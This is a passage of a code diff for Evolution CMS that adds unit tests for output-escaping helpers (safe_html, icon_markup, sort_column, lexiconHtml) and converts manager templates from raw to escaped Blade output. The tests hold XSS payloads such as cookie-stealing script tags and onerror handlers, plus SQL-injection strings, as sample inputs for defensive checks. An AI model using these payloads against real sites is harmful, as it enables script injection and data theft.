+    $fixed = renderBladeFragment('<script>var a = @js($value);</script>', ['value' => $lexicon]);
+
+    expect($broken)->toContain('&#039;')
+        ->and($broken)->toContain('&amp;');
+
+    expect($fixed)->not->toContain('&#039;')
+        ->and($fixed)->not->toContain('&quot;')
+        ->and($fixed)->not->toContain('&amp;');
+});
+
+test('js_json keeps the payload inside the JSON literal and still decodes to the original', function () {
+    // js_json() embeds raw JSON (no JSON.parse wrapper), which is why it has to escape `<` and
+    // `>` itself; apostrophes stay literal on purpose.
+    $payload = [
+        'confirm_delete_resource' => "Delete 'Home'?",
+        'evil' => '</script><script>alert(1)</script>',
+    ];
+
+    $json = (string) js_json($payload);
+
+    expect($json)->toContain("Delete 'Home'?")
+        ->and($json)->not->toContain('</script>')
+        ->and($json)->toContain('\u003C/script\u003E');
+
+    // Nothing is lost: a browser decodes it back to exactly the input.
+    expect(json_decode($json, true))->toBe($payload);
+
+    // And it is Htmlable, so the template prints it with `{{ }}`.
+    expect(e(js_json($payload)))->toBe($json);
+});

--- a/core/tests/Unit/Security/ManagerOutputHelpersTest.php
+++ b/core/tests/Unit/Security/ManagerOutputHelpersTest.php
@@ -1,0 +1,229 @@
+<?php
+
+use EvolutionCMS\Controllers\Search;
+use EvolutionCMS\ManagerTheme;
+use Illuminate\Support\HtmlString;
+
+/*
+|--------------------------------------------------------------------------
+| The producers that replaced `{!! !!}`
+|--------------------------------------------------------------------------
+|
+| Each of these used to hand a raw string to a template that opted out of escaping. They now
+| decide for themselves what is safe and return Htmlable, so the templates can use `{{ }}`.
+|
+*/
+
+test('icon_markup escapes a class list into the class attribute', function () {
+    expect(icon_markup('fa fa-cube'))->toBe('<i class="fa fa-cube"></i>');
+
+    // A value that tries to close the attribute stays inside it.
+    expect(icon_markup('fa" onmouseover="alert(1)'))
+        ->toBe('<i class="fa&quot; onmouseover=&quot;alert(1)"></i>');
+});
+
+test('icon_markup passes ready made markup through and drops empty values', function () {
+    $svg = '<svg viewBox="0 0 24 24"><path d="M0 0h24v24H0z"/></svg>';
+
+    expect(icon_markup($svg))->toBe($svg)
+        ->and(icon_markup(''))->toBe('')
+        ->and(icon_markup(null))->toBe('')
+        ->and(icon_markup(['fa']))->toBe('');
+});
+
+test('icon_markup appends literal attributes supplied by the template', function () {
+    expect(icon_markup('fa fa-link', ' aria-hidden="true"'))
+        ->toBe('<i class="fa fa-link" aria-hidden="true"></i>');
+});
+
+test('icon_html is the Htmlable form and is not encoded again by Blade', function () {
+    $icon = icon_html('fa fa-cube');
+
+    expect($icon)->toBeInstanceOf(HtmlString::class)
+        ->and(e($icon))->toBe('<i class="fa fa-cube"></i>');
+});
+
+test('sort_direction accepts only the two valid keywords', function () {
+    expect(sort_direction('asc'))->toBe('ASC')
+        ->and(sort_direction(' DESC '))->toBe('DESC')
+        ->and(sort_direction('ASC', 'ASC'))->toBe('ASC');
+
+    // Anything else is attacker controlled text and falls back to the default.
+    foreach (['DESC"><script>alert(1)</script>', 'ASC, (SELECT 1)', '', null, ['ASC']] as $payload) {
+        expect(sort_direction($payload))->toBe('DESC');
+    }
+
+    expect(sort_direction('nonsense', 'ASC'))->toBe('ASC');
+});
+
+test('sort_column accepts only a plain identifier', function () {
+    expect(sort_column('pagetitle'))->toBe('pagetitle')
+        ->and(sort_column('menu_index'))->toBe('menu_index')
+        ->and(sort_column('X1'))->toBe('X1');
+
+    foreach ([
+        'createdon"><img src=x onerror=alert(1)>',
+        'id`, (SELECT password FROM users)',
+        'site_content.id',
+        '1 UNION SELECT 1',
+        '',
+        null,
+    ] as $payload) {
+        expect(sort_column($payload))->toBe('createdon');
+    }
+
+    expect(sort_column('bad value', 'menuindex'))->toBe('menuindex');
+});
+
+test('the request derived link fragment is inert once the parts are normalised', function () {
+    // This is exactly how the resource page assembles the sort suffix it prints back into links.
+    $request = [
+        'dir' => 'DESC" onmouseover="alert(1)',
+        'sort' => 'createdon"><script>alert(1)</script>',
+        'page' => '2"><script>alert(1)</script>',
+    ];
+
+    $addPath = '&dir=' . sort_direction(get_by_key($request, 'dir'))
+        . '&sort=' . sort_column(get_by_key($request, 'sort'))
+        . '&page=' . (int) $request['page'];
+
+    expect($addPath)->toBe('&dir=DESC&sort=createdon&page=2')
+        ->and($addPath)->not->toContain('<')
+        ->and($addPath)->not->toContain('"');
+});
+
+test('lexiconHtml keeps the markup of the entry and escapes what is substituted into it', function () {
+    $theme = managerThemeWith([
+        'lexicon' => [
+            'password_msg' => 'The new password for <b>:username</b> is <b>:password</b><br>',
+            'update_tree_time' => 'Updated %s resources in %s seconds',
+        ],
+    ]);
+
+    $message = $theme->lexiconHtml('password_msg', [
+        'username' => '<img src=x onerror=alert(1)>',
+        'password' => "p@ss'&<>",
+    ]);
+
+    expect($message)->toBeInstanceOf(HtmlString::class);
+
+    // The entry keeps its own markup...
+    expect((string) $message)->toContain('<b>')
+        ->and((string) $message)->toContain('<br>');
+
+    // ...the substituted username cannot add any: the payload is text inside the <b> element.
+    expect((string) $message)->not->toContain('<img')
+        ->and((string) $message)->not->toMatch('~<[a-zA-Z][^>]*\s[^>]*>~');
+
+    // ...and the generated password is still readable once the browser decodes it.
+    expect(html_entity_decode(strip_tags((string) $message), ENT_QUOTES, 'UTF-8'))
+        ->toContain("p@ss'&<>");
+});
+
+test('lexiconHtml supports the positional entries that used sprintf', function () {
+    $theme = managerThemeWith([
+        'lexicon' => ['update_tree_time' => 'Updated %s resources in %s seconds'],
+    ]);
+
+    expect((string) $theme->lexiconHtml('update_tree_time', [12, '0.4']))
+        ->toBe('Updated 12 resources in 0.4 seconds');
+});
+
+test('styleHtml returns theme markup as Htmlable and never an array', function () {
+    $theme = managerThemeWith([
+        'style' => [
+            'actionbuttons' => ['dynamic' => ['save' => '<div id="actions"><a>Save</a></div>']],
+            'icon_cube' => 'fa fa-cube',
+        ],
+    ]);
+
+    expect((string) $theme->styleHtml('actionbuttons.dynamic.save'))
+        ->toBe('<div id="actions"><a>Save</a></div>');
+
+    expect(e($theme->styleHtml('icon_cube')))->toBe('fa fa-cube');
+
+    // A key that resolves to an array (or is missing) must not leak "Array" into the page.
+    expect((string) $theme->styleHtml('actionbuttons'))->toBe('')
+        ->and((string) $theme->styleHtml('nothing_here'))->toBe('');
+});
+
+test('search result titles are escaped before the highlight markup is added', function () {
+    $search = searchControllerWithCharset('UTF-8');
+
+    $highlight = function (string $text, string $needle) use ($search) {
+        $method = new ReflectionMethod(Search::class, 'highlightingCoincidence');
+        $method->setAccessible(true);
+
+        return $method->invoke($search, $text, $needle);
+    };
+
+    // A stored page title carrying a payload, searched for by a harmless term.
+    $result = $highlight('Home <script>alert(1)</script>', 'Home');
+
+    expect($result)->toBeInstanceOf(HtmlString::class)
+        ->and((string) $result)->toBe('<span class="text-danger">Home</span> &lt;script&gt;alert(1)&lt;/script&gt;');
+
+    // A payload in the search term itself cannot introduce markup either.
+    $reflected = (string) $highlight('Home', '"><img src=x onerror=alert(1)>');
+
+    expect($reflected)->not->toContain('<img')
+        ->and($reflected)->toBe('Home');
+
+    // An empty search term returns the escaped text without any highlight element.
+    expect((string) $highlight('a & b', ''))->toBe('a &amp; b');
+});
+
+/**
+ * Build a ManagerTheme with only the presentation data the tested methods need.
+ */
+function managerThemeWith(array $properties): ManagerTheme
+{
+    $theme = (new ReflectionClass(ManagerTheme::class))->newInstanceWithoutConstructor();
+
+    foreach ($properties as $name => $value) {
+        $property = new ReflectionProperty(ManagerTheme::class, $name);
+        $property->setAccessible(true);
+        $property->setValue($theme, $value);
+    }
+
+    return $theme;
+}
+
+/**
+ * Build a Search controller whose manager theme stub only answers the charset lookup.
+ *
+ * The controller is created without running its constructor and the (untyped) managerTheme
+ * property is injected directly, so the test needs no container and no database.
+ */
+function searchControllerWithCharset(string $charset): Search
+{
+    $core = new class($charset) {
+        public function __construct(private string $charset)
+        {
+        }
+
+        public function getConfig($name = '', $default = null)
+        {
+            return $name === 'evo_charset' ? $this->charset : $default;
+        }
+    };
+
+    $theme = new class($core) {
+        public function __construct(private object $core)
+        {
+        }
+
+        public function getCore(): object
+        {
+            return $this->core;
+        }
+    };
+
+    $search = (new ReflectionClass(Search::class))->newInstanceWithoutConstructor();
+
+    $property = new ReflectionProperty(Search::class, 'managerTheme');
+    $property->setAccessible(true);
+    $property->setValue($search, $theme);
+
+    return $search;
+}

--- a/core/tests/Unit/Security/SafeHtmlTest.php
+++ b/core/tests/Unit/Security/SafeHtmlTest.php
@@ -1,0 +1,125 @@
+<?php
+
+use Illuminate\Contracts\Support\Htmlable;
+use Illuminate\Support\HtmlString;
+
+/*
+|--------------------------------------------------------------------------
+| safe_html()
+|--------------------------------------------------------------------------
+|
+| safe_html() is the replacement for `{!! !!}` on stored values that are allowed to carry simple
+| formatting: everything is escaped first, then a fixed list of attribute-free tags is restored.
+| The tests below drive the helper with independent sample data - none of them look at the
+| templates that call it.
+|
+*/
+
+test('formatting written by the CMS survives, injected script markup does not', function () {
+    // A message in the shape logEvent() writes: CMS formatting plus a value from the request.
+    $stored = 'Import failed<br />'
+        . '<pre>row 12: <script>alert(document.cookie)</script></pre>';
+
+    $rendered = (string) safe_html($stored);
+
+    // The formatting the CMS itself produced is still markup...
+    expect($rendered)->toContain('<br />')
+        ->and($rendered)->toContain('<pre>')
+        ->and($rendered)->toContain('</pre>');
+
+    // ...but the injected element is inert text, not an element.
+    expect($rendered)->not->toContain('<script>')
+        ->and($rendered)->not->toContain('</script>')
+        ->and($rendered)->toContain('&lt;script&gt;alert(document.cookie)&lt;/script&gt;');
+});
+
+test('attributes cannot survive the allow list', function () {
+    $payloads = [
+        '<img src=x onerror=alert(1)>',
+        '<svg/onload=alert(1)>',
+        '<a href="javascript:alert(1)">click</a>',
+        '<iframe srcdoc="<script>alert(1)</script>"></iframe>',
+        '<body onload=alert(1)>',
+        '<div style="background:url(javascript:alert(1))">x</div>',
+        '<span onmouseover="alert(1)">hover</span>',
+    ];
+
+    foreach ($payloads as $payload) {
+        $rendered = (string) safe_html($payload);
+
+        // The payload text may still be readable - it is now content, not markup. What matters is
+        // that no element with an attribute is left in the output, because every attack above
+        // needs one (onerror=, href=, srcdoc=, style=, onmouseover=).
+        expect($rendered)->not->toMatch('~<[a-zA-Z][^>]*\s[^>]*>~');
+
+        // ...and none of the dangerous element names survive as an element.
+        foreach (['img', 'svg', 'a', 'iframe', 'body', 'script'] as $tag) {
+            expect($rendered)->not->toContain('<' . $tag)
+                ->and($rendered)->not->toContain('</' . $tag . '>');
+        }
+    }
+});
+
+test('an allow-listed tag name is only restored when it carries no attributes', function () {
+    // `span` and `div` are on the allow list, so an attacker will try to smuggle attributes in.
+    $rendered = (string) safe_html('<span class="x" onclick="alert(1)">a</span><span>b</span>');
+
+    expect($rendered)->toBe('&lt;span class=&quot;x&quot; onclick=&quot;alert(1)&quot;&gt;a</span><span>b</span>');
+});
+
+test('closing and self-closing forms are restored, in any letter case', function () {
+    expect((string) safe_html('a<br>b<BR/>c<br />d<HR>e'))
+        ->toBe('a<br>b<BR/>c<br />d<HR>e');
+});
+
+test('text is escaped exactly once', function () {
+    // Plain text: encoded once, and only once.
+    expect((string) safe_html('Tom & Jerry'))->toBe('Tom &amp; Jerry');
+
+    // Text that already carries entities keeps its meaning instead of being encoded again -
+    // this is what makes the helper safe to apply to rows written by older versions.
+    expect((string) safe_html('Tom &amp; Jerry said &#039;hi&#039;'))
+        ->toBe('Tom &amp; Jerry said &#039;hi&#039;');
+
+    // And applying it twice does not change the result either.
+    $once = (string) safe_html('5 < 6 & "quoted"');
+    expect((string) safe_html($once))->toBe($once);
+});
+
+test('a custom allow list is honoured and an empty one escapes everything', function () {
+    expect((string) safe_html('<b>bold</b><br>', ['br']))
+        ->toBe('&lt;b&gt;bold&lt;/b&gt;<br>');
+
+    expect((string) safe_html('<b>bold</b><br>', []))
+        ->toBe('&lt;b&gt;bold&lt;/b&gt;&lt;br&gt;');
+});
+
+test('a bogus tag name in the allow list cannot open a hole', function () {
+    // If a caller passes something that is not a bare tag name it is dropped rather than
+    // spliced into the restore pattern.
+    $rendered = (string) safe_html('<script>alert(1)</script>', ['script[^>]*', 'b']);
+
+    expect($rendered)->toBe('&lt;script&gt;alert(1)&lt;/script&gt;');
+});
+
+test('non string input degrades to an empty value instead of leaking a type error', function () {
+    expect((string) safe_html(null))->toBe('')
+        ->and((string) safe_html(['<script>alert(1)</script>']))->toBe('')
+        ->and((string) safe_html(42))->toBe('42');
+});
+
+test('the result is Htmlable so Blade prints it without encoding it a second time', function () {
+    $result = safe_html('a & b<br>');
+
+    expect($result)->toBeInstanceOf(HtmlString::class)
+        ->and($result)->toBeInstanceOf(Htmlable::class);
+
+    // e() is what `{{ }}` compiles to. Htmlable values pass through untouched.
+    expect(e($result))->toBe('a &amp; b<br>');
+});
+
+test('an already sanitised value is not sanitised twice', function () {
+    $once = safe_html('<b>x</b> & <script>alert(1)</script>');
+
+    expect((string) safe_html($once))->toBe((string) $once);
+});

--- a/manager/views/frame/1.blade.php
+++ b/manager/views/frame/1.blade.php
@@ -1,29 +1,10 @@
 @php
-if (!function_exists('jsSvg')) {
-    function jsSvg($svg) {
-        $svg = str_replace(["\n", "\r", "\t"], '', $svg);
-        $svg = preg_replace('/\s+/', ' ', $svg);
-        return json_encode(trim($svg));
-    }
-}
-if (!function_exists('jsIcon')) {
-    function jsIcon($icon) {
-        if (strpos($icon, '<') === false) {
-            if (strpos($icon, 'tabler-') === 0) {
-                $icon = svg($icon)->toHtml();
-            } else {
-                $icon = '<i class="' . $icon . '"></i>';
-            }
-        }
-        return jsSvg($icon);
-    }
-}
-if (!function_exists('iconHtml')) {
-    function iconHtml($icon, $attrs = '') {
-        if (strpos($icon, '<svg') !== false) {
-            return $icon;
-        }
-        return '<i class="' . $icon . '"' . $attrs . '></i>';
+// Icon markup now comes from the global icon_markup()/icon_html() helpers, so the templates can
+// print it with {{ }} instead of raw output. jsIconMarkup() only collapses the whitespace of the
+// icons that are embedded into the JavaScript configuration below; @js() does the escaping.
+if (!function_exists('jsIconMarkup')) {
+    function jsIconMarkup($icon) {
+        return trim(preg_replace('/\s+/', ' ', str_replace(["\n", "\r", "\t"], '', icon_markup($icon))));
     }
 }
 
@@ -58,7 +39,7 @@ $managerTitle = evo()->getConfig('site_name') . ' - (Evolution CMS Manager)';
 <!DOCTYPE html>
 <html dir="{{ManagerTheme::getTextDir()}}" lang="{{ManagerTheme::getLang()}}" xml:lang="{{ManagerTheme::getLang()}}" class="manager-frame {{ManagerTheme::getThemeStyle()}}">
 <head>
-    <title>{!! $managerTitle !!}</title>
+    <title>{{ $managerTitle }}</title>
     <meta http-equiv="Content-Type" content="text/html; charset={{ManagerTheme::getCharset()}}" />
     <meta name="viewport" content="initial-scale=1.0,user-scalable=no,maximum-scale=1,width=device-width" />
     <meta name="theme-color" content="{{ ManagerTheme::getThemeColor() }}" />
@@ -110,11 +91,11 @@ $managerTitle = evo()->getConfig('site_name') . ' - (Evolution CMS Manager)';
             MODX_MANAGER_URL: '{{EVO_MANAGER_URL}}',
             user: {
                 role: {{(int)$user['role']}},
-                username: '{{$user['username']}}',
-                groups: {!!json_encode(evo()->getUserDocGroups())!!}
+                username: @js($user['username']),
+                groups: @js(evo()->getUserDocGroups())
             },
             config: {
-                manager_title: {!! json_encode($managerTitle, JSON_UNESCAPED_UNICODE | JSON_UNESCAPED_SLASHES) !!},
+                manager_title: @js($managerTitle),
                 menu_height: {{(int)evo()->getConfig('manager_menu_height')}},
                 tree_width: {{(int)$EVO_widthSideBar}},
                 tree_min_width: {{(int)$tree_min_width}},
@@ -132,7 +113,7 @@ $managerTitle = evo()->getConfig('site_name') . ' - (Evolution CMS Manager)';
                 itemToChange: '',
                 selectedObjectName: null
             },
-            lang: {!! js_json([
+            lang: {{ js_json([
                 'already_deleted' => ManagerTheme::getLexicon('already_deleted'),
                 'cm_unknown_error' => ManagerTheme::getLexicon('cm_unknown_error'),
                 'collapse_tree' => ManagerTheme::getLexicon('collapse_tree'),
@@ -155,40 +136,40 @@ $managerTitle = evo()->getConfig('site_name') . ' - (Evolution CMS Manager)';
                 'unable_set_parent' => ManagerTheme::getLexicon('unable_set_parent'),
                 'working' => ManagerTheme::getLexicon('working'),
                 'paging_prev' => ManagerTheme::getLexicon('paging_prev'),
-            ]) !!},
+            ]) }},
             style: {
-                actions_file: '{!!addslashes($_style['icon_file'])!!}',
-                actions_pencil: '{!!addslashes($_style['icon_pencil'])!!}',
-                actions_plus: '{!!addslashes($_style['icon_plus'])!!}',
-                actions_reply: '{!!addslashes($_style['icon_reply'])!!}',
-                collapse_tree: {!! jsIcon($_style['icon_arrow_up_circle']) !!},
-                email: '{!!addslashes('<i class="' . $_style['icon_mail'] . '"></i>')!!}',
-                expand_tree: {!! jsIcon($_style['icon_arrow_down_circle']) !!},
-                icon_angle_left: '{!!addslashes($_style['icon_angle_left'])!!}',
-                icon_angle_right: '{!!addslashes($_style['icon_angle_right'])!!}',
-                icon_chunk: '{!!addslashes($_style['icon_chunk'])!!}',
-                icon_circle: '{!!addslashes($_style['icon_circle'])!!}',
-                icon_code: '{!!addslashes($_style['icon_code'])!!}',
-                icon_edit: '{!!addslashes($_style['icon_edit'])!!}',
-                icon_element: '{!!addslashes($_style['icon_elements'])!!}',
-                icon_folder: '{!!addslashes('<i class="' . $_style['icon_folder'] . '"></i>')!!}',
-                icon_plugin: '{!!addslashes($_style['icon_plugin'])!!}',
-                icon_refresh: '{!!addslashes($_style['icon_refresh'])!!}',
-                icon_spin: '{!!addslashes($_style['icon_spin'])!!}',
-                icon_template: '{!!addslashes($_style['icon_template'])!!}',
-                icon_trash: {!! jsIcon($_style['icon_trash']) !!},
-                icon_trash_alt: {!! jsIcon($_style['icon_trash_alt']) !!},
-                icon_tv: '{!!addslashes($_style['icon_tv'])!!}',
-                icons_external_link: '{!!addslashes('<i class="' . $_style['icon_external_link'] . '"></i>')!!}',
-                icons_working: {!! jsIcon($_style['icon_info_triangle']) !!},
-                tree_folder: '{!!addslashes('<i class="' . $_style['icon_folder'] . '"></i>')!!}',
-                tree_folder_secure: '{!!addslashes('<i class="' . $_style['icon_folder'] . '"></i>')!!}',
-                tree_folderopen: '{!!addslashes('<i class="' . $_style['icon_folder_open'] . '"></i>')!!}',
-                tree_folderopen_secure: '{!!addslashes('<i class="' . $_style['icon_folder_open'] . '"></i>')!!}',
-                tree_info: {!! jsIcon($_style['icon_info_circle']) !!},
-                tree_minusnode: '{!!addslashes('<i class="' . $_style['icon_angle_down'] . '"></i>')!!}',
-                tree_plusnode: '{!!addslashes('<i class="' . $_style['icon_angle_right'] . '"></i>')!!}',
-                tree_preview_resource: '{!!addslashes('<i class="' . $_style['icon_eye'] . '"></i>')!!}'
+                actions_file: @js(jsIconMarkup($_style['icon_file'])),
+                actions_pencil: @js(jsIconMarkup($_style['icon_pencil'])),
+                actions_plus: @js(jsIconMarkup($_style['icon_plus'])),
+                actions_reply: @js(jsIconMarkup($_style['icon_reply'])),
+                collapse_tree: @js(jsIconMarkup($_style['icon_arrow_up_circle'])),
+                email: @js(jsIconMarkup($_style['icon_mail'])),
+                expand_tree: @js(jsIconMarkup($_style['icon_arrow_down_circle'])),
+                icon_angle_left: @js(jsIconMarkup($_style['icon_angle_left'])),
+                icon_angle_right: @js(jsIconMarkup($_style['icon_angle_right'])),
+                icon_chunk: @js(jsIconMarkup($_style['icon_chunk'])),
+                icon_circle: @js(jsIconMarkup($_style['icon_circle'])),
+                icon_code: @js(jsIconMarkup($_style['icon_code'])),
+                icon_edit: @js(jsIconMarkup($_style['icon_edit'])),
+                icon_element: @js(jsIconMarkup($_style['icon_elements'])),
+                icon_folder: @js(jsIconMarkup($_style['icon_folder'])),
+                icon_plugin: @js(jsIconMarkup($_style['icon_plugin'])),
+                icon_refresh: @js(jsIconMarkup($_style['icon_refresh'])),
+                icon_spin: @js(jsIconMarkup($_style['icon_spin'])),
+                icon_template: @js(jsIconMarkup($_style['icon_template'])),
+                icon_trash: @js(jsIconMarkup($_style['icon_trash'])),
+                icon_trash_alt: @js(jsIconMarkup($_style['icon_trash_alt'])),
+                icon_tv: @js(jsIconMarkup($_style['icon_tv'])),
+                icons_external_link: @js(jsIconMarkup($_style['icon_external_link'])),
+                icons_working: @js(jsIconMarkup($_style['icon_info_triangle'])),
+                tree_folder: @js(jsIconMarkup($_style['icon_folder'])),
+                tree_folder_secure: @js(jsIconMarkup($_style['icon_folder'])),
+                tree_folderopen: @js(jsIconMarkup($_style['icon_folder_open'])),
+                tree_folderopen_secure: @js(jsIconMarkup($_style['icon_folder_open'])),
+                tree_info: @js(jsIconMarkup($_style['icon_info_circle'])),
+                tree_minusnode: @js(jsIconMarkup($_style['icon_angle_down'])),
+                tree_plusnode: @js(jsIconMarkup($_style['icon_angle_right'])),
+                tree_preview_resource: @js(jsIconMarkup($_style['icon_eye']))
             },
             permission: {
                 assets_images: {{evo()->hasPermission('assets_images') ? 1 : 0}},
@@ -260,7 +241,7 @@ $managerTitle = evo()->getConfig('site_name') . ' - (Evolution CMS Manager)';
                         <li id="searchform">
                             <form action="index.php?a=71" method="post" target="main">
                                 <input type="hidden" value="Search" name="submitok" />
-                                <label for="searchid" class="label_searchid">{!! $_style['icon_search'] !!}</label>
+                                <label for="searchid" class="label_searchid">{{ icon_html($_style['icon_search']) }}</label>
                                 <input type="text" id="searchid" name="searchid" size="25" />
                                 <div class="mask"></div>
                             </form>
@@ -268,32 +249,32 @@ $managerTitle = evo()->getConfig('site_name') . ' - (Evolution CMS Manager)';
                         @if (evo()->getConfig('show_newresource_btn') && evo()->hasPermission('new_document'))
                             <li id="newresource" class="dropdown newresource">
                                 <a href="javascript:;" class="dropdown-toggle" onclick="return false;" title="{{ManagerTheme::getLexicon('add_resource')}}">
-                                    {!! $_style['icon_add'] !!}
+                                    {{ icon_html($_style['icon_add']) }}
                                 </a>
                                 <ul class="dropdown-menu">
                                     @if (evo()->hasPermission('new_document'))
                                         <li>
                                             <a onclick="" href="index.php?a=4" target="main">
-                                                {!! $_style['icon_add'] !!} {{ManagerTheme::getLexicon('add_resource')}}
+                                                {{ icon_html($_style['icon_add']) }} {{ManagerTheme::getLexicon('add_resource')}}
                                             </a>
                                         </li>
                                         <li>
                                             <a onclick="" href="index.php?a=72" target="main">
-                                                {!! iconHtml($_style['icon_chain']) !!} {{ManagerTheme::getLexicon('add_weblink')}}
+                                                {{ icon_html($_style['icon_chain']) }} {{ManagerTheme::getLexicon('add_weblink')}}
                                             </a>
                                         </li>
                                     @endif
                                     @if (evo()->getConfig('use_browser') && evo()->hasPermission('assets_images'))
                                         <li>
                                             <a onclick="" href="media/browser/{{evo()->getConfig('which_browser')}}/browse.php?&type=images" target="main">
-                                                {!! $_style['icon_camera'] !!} {{ManagerTheme::getLexicon('images_management')}}
+                                                {{ icon_html($_style['icon_camera']) }} {{ManagerTheme::getLexicon('images_management')}}
                                             </a>
                                         </li>
                                     @endif
                                     @if (evo()->getConfig('use_browser') && evo()->hasPermission('assets_files'))
                                         <li>
                                             <a onclick="" href="media/browser/{{$modx->getConfig('which_browser')}}/browse.php?&type=files" target="main">
-                                                {!! $_style['icon_files'] !!} {{ManagerTheme::getLexicon('files_management')}}
+                                                {{ icon_html($_style['icon_files']) }} {{ManagerTheme::getLexicon('files_management')}}
                                             </a>
                                         </li>
                                     @endif
@@ -302,36 +283,39 @@ $managerTitle = evo()->getConfig('site_name') . ' - (Evolution CMS Manager)';
                         @endif
                         <li id="preview">
                             <a href="../" target="_blank" title="{{ManagerTheme::getLexicon('preview')}}">
-                                {!! $_style['icon_desktop'] !!}
+                                {{ icon_html($_style['icon_desktop']) }}
                             </a>
                         </li>
                         <li id="account" class="dropdown account">
                             <a href="javascript:;" class="dropdown-toggle" onclick="return false;">
                                 @if ($user['photo'])
-                                    <span class="icon photo" style="background-image: url({!!EVO_SITE_URL . entities($user['photo'], evo()->getConfig('modx_charset'))!!});"></span>
+                                    {{-- The value lands in a CSS url(): quote it and drop the characters that could
+                                        close the function or start a new declaration, then let {{ }} escape the
+                                        attribute itself. --}}
+                                    <span class="icon photo" style="background-image: url('{{ EVO_SITE_URL . preg_replace('~[\'"()\\\\;\s]+~', '', (string) $user['photo']) }}');"></span>
                                 @else
-                                    <span class="icon">{!! $_style['icon_user'] !!}</span>
+                                    <span class="icon">{{ icon_html($_style['icon_user']) }}</span>
                                 @endif
-                                <span class="username">{{entities($user['username'], evo()->getConfig('modx_charset'))}}</span>
+                                <span class="username">{{ $user['username'] }}</span>
                             </a>
                             <ul class="dropdown-menu">
                                 @if (evo()->hasPermission('change_password'))
                                     <li>
                                         <a onclick="" href="index.php?a=28" target="main">
-                                            {!! $_style['icon_lock'] !!} {{ManagerTheme::getLexicon('change_password')}}
+                                            {{ icon_html($_style['icon_lock']) }} {{ManagerTheme::getLexicon('change_password')}}
                                         </a>
                                     </li>
                                 @endif
                                 <li>
                                     <a href="index.php?a=8">
-                                        {!! $_style['icon_logout'] !!} {{ManagerTheme::getLexicon('logout')}}
+                                        {{ icon_html($_style['icon_logout']) }} {{ManagerTheme::getLexicon('logout')}}
                                     </a>
                                 </li>
                             </ul>
                         </li>
                         <li id="theme">
                             <a id="treeMenu_theme_dark" onclick="evo.tree.toggleTheme(event)" title="{{ManagerTheme::getLexicon('manager_theme_mode_title')}}">
-                                <span class="icon">{!! $_style['icon_theme'] !!}</span>
+                                <span class="icon">{{ icon_html($_style['icon_theme']) }}</span>
                             </a>
                         </li>
                         @if (
@@ -342,46 +326,46 @@ $managerTitle = evo()->getConfig('site_name') . ' - (Evolution CMS Manager)';
                         )
                             <li id="system" class="dropdown">
                                 <a href="javascript:;" class="dropdown-toggle" title="{{ManagerTheme::getLexicon('system')}}" onclick="return false;">
-                                    {!! $_style['icon_cogs'] !!}
+                                    {{ icon_html($_style['icon_cogs']) }}
                                 </a>
                                 <ul class="dropdown-menu">
                                     @if (evo()->hasPermission('settings'))
                                         <li>
                                             <a href="index.php?a=17" target="main">
-                                                {!! $_style['icon_sliders'] !!} {{ManagerTheme::getLexicon('edit_settings')}}
+                                                {{ icon_html($_style['icon_sliders']) }} {{ManagerTheme::getLexicon('edit_settings')}}
                                             </a>
                                         </li>
                                     @endif
                                     @if (evo()->hasPermission('view_eventlog'))
                                         <li>
                                             <a href="index.php?a=70" target="main">
-                                                {!! $_style['icon_calendar'] !!} {{ManagerTheme::getLexicon('site_schedule')}}
+                                                {{ icon_html($_style['icon_calendar']) }} {{ManagerTheme::getLexicon('site_schedule')}}
                                             </a>
                                         </li>
                                     @endif
                                     @if (evo()->hasPermission('view_eventlog'))
                                         <li>
                                             <a href="index.php?a=114" target="main">
-                                                {!! $_style['icon_info_triangle'] !!} {{ManagerTheme::getLexicon('eventlog_viewer')}}
+                                                {{ icon_html($_style['icon_info_triangle']) }} {{ManagerTheme::getLexicon('eventlog_viewer')}}
                                             </a>
                                         </li>
                                     @endif
                                     @if (evo()->hasPermission('logs'))
                                         <li>
                                             <a href="index.php?a=13" target="main">
-                                                {!! $_style['icon_user_secret'] !!} {{ManagerTheme::getLexicon('view_logging')}}
+                                                {{ icon_html($_style['icon_user_secret']) }} {{ManagerTheme::getLexicon('view_logging')}}
                                             </a>
                                         </li>
                                         <li>
                                             <a href="index.php?a=53" target="main">
-                                                {!! $_style['icon_info_circle'] !!} {{ManagerTheme::getLexicon('view_sysinfo')}}
+                                                {{ icon_html($_style['icon_info_circle']) }} {{ManagerTheme::getLexicon('view_sysinfo')}}
                                             </a>
                                         </li>
                                     @endif
                                     @if (evo()->hasPermission('help'))
                                         <li>
                                             <a href="index.php?a=9" target="main">
-                                                {!! $_style['icon_question_circle'] !!} {{ManagerTheme::getLexicon('help')}}
+                                                {{ icon_html($_style['icon_question_circle']) }} {{ManagerTheme::getLexicon('help')}}
                                             </a>
                                         </li>
                                     @endif
@@ -395,7 +379,7 @@ $managerTitle = evo()->getConfig('site_name') . ' - (Evolution CMS Manager)';
                         @if (evo()->getConfig('show_fullscreen_btn'))
                             <li id="fullscreen">
                                 <a href="javascript:;" onclick="toggleFullScreen();" id="toggleFullScreen" title="{{ManagerTheme::getLexicon('toggle_fullscreen')}}">
-                                    {!! $_style['icon_expand'] !!}
+                                    {{ icon_html($_style['icon_expand']) }}
                                 </a>
                             </li>
                         @endif
@@ -410,7 +394,7 @@ $managerTitle = evo()->getConfig('site_name') . ' - (Evolution CMS Manager)';
             <div class="tab-row-container evo-tab-row">
                 <div class="tab-row">
                     <h2 id="evo-tab-home" class="tab selected" data-target="evo-tab-page-home" style="display:none!important;">
-                        {!! iconHtml($_style['icon_home']) !!}
+                        {{ icon_html($_style['icon_home']) }}
                     </h2>
                 </div>
             </div>
@@ -528,7 +512,7 @@ $managerTitle = evo()->getConfig('site_name') . ' - (Evolution CMS Manager)';
         {
             if ((bool) $allowed) {
                 echo '<div class="menuLink" id="item' . $action . '" onclick="evo.tree.menuHandler(' . $action . ');">';
-                echo iconHtml($img) . ' ' . $text . '</div>';
+                echo icon_markup($img) . ' ' . e($text) . '</div>';
             }
         }
     }
@@ -642,7 +626,7 @@ $managerTitle = evo()->getConfig('site_name') . ' - (Evolution CMS Manager)';
             $('#toggleFullScreen').click(function() {
                 var $toggle = $(this);
                 var isExpanded = $toggle.data('expanded') === true;
-                $toggle.html(isExpanded ? {!! jsIcon($_style['icon_expand']) !!} : {!! jsIcon($_style['icon_compress']) !!});
+                $toggle.html(isExpanded ? @js(jsIconMarkup($_style['icon_expand'])) : @js(jsIconMarkup($_style['icon_compress'])));
                 $toggle.data('expanded', !isExpanded);
             });
         </script>
@@ -783,7 +767,7 @@ $managerTitle = evo()->getConfig('site_name') . ' - (Evolution CMS Manager)';
                 <div class="panel-heading">
